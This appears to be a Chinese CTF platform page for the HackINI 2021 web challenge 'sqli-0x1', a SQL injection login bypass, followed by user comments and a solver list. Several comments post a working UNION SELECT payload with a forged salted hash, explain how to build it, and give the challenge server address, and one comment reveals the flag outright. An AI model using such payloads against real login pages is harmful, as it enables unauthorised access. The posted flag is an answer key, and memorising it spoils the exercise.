sqli-0x1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2621
提  示: shellmates{********}
描  述:

SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.

...
登录回复
评论
Zpfhh 5月前
举报

用POST请求这个payload:user=a'union%09select%092,'7d0515bb9407af379e2ab13a58ee470d1f8815f56ffffa07ee5c0136e00fea0d$ttack'--+&pass=hacka 用HackBar工具秒解

回复 1
cfggfbfxdgbb 6月前
举报

我的wp: https://blog.csdn.net/cfggbfxdgbb/article/details/155936538?spm=1001.2014.3001.5502

回复 1
hengdonghui 6月前
举报

格式是: shellmates{********} 不是flag{******}格式。

回复 0
白乐 6月前
举报

如何知道它是SHA-256加密的呢,以及它是如何排列的呢

回复 0
L0GAN 6月前
举报

/?pls_help,审计代码

回复 0
Alune 7月前
举报

加盐密码哈希

回复 0
15031597817 9月前
举报

这个登上以后不出flag咋办

回复 2
a543589796 9月前
举报

这道题为什么sqlmap跑不出来啊?

回复 0
lunarbyside 1年前
举报

user=1'union select 1,'你的密码与你的盐值拼接后的字符串计算的哈希值$你的盐值&pass=你的密码。第一列为用户名username,第二列为密码password。由于查询不到用户“1”,所以查询返回的结果被union后面的值替代,第二列password值会被替换为你的哈希值和你的盐值,你就能用自己的密码登录啦☺

回复 5
Systems 1年前
举报

http://49.232.142.230:12520/?pls_help 源代码大家直接代码审计

回复 4
33555 1年前
举报

shellmates{c0ngr4tul4t10ns_U_d1d_1t!!_fe4cd84591ea}

回复 0

WriteUp

image
a2cai

2 金币

立即查看

评分(31)

解题动态

hardees90 攻破了该题 13小时前
Decay_念 攻破了该题 1天前
何以书 攻破了该题 1天前
13615049106 攻破了该题 1天前
胜天3号 攻破了该题 3天前
hxwzh 攻破了该题 5天前
LiEasy 攻破了该题 5天前
fanliao 攻破了该题 6天前
顶风作案 攻破了该题 6天前
ggtom 攻破了该题 6天前
Aria@ 攻破了该题 6天前
胰梅子子 攻破了该题 6天前
时意 攻破了该题 6天前
politely 攻破了该题 7天前
Hydron 攻破了该题 7天前
asdliuyan 攻破了该题 7天前
KDB 攻破了该题 8天前
寒醨 攻破了该题 8天前
lijingxin02 攻破了该题 9天前
18054131721 攻破了该题 9天前
问题反馈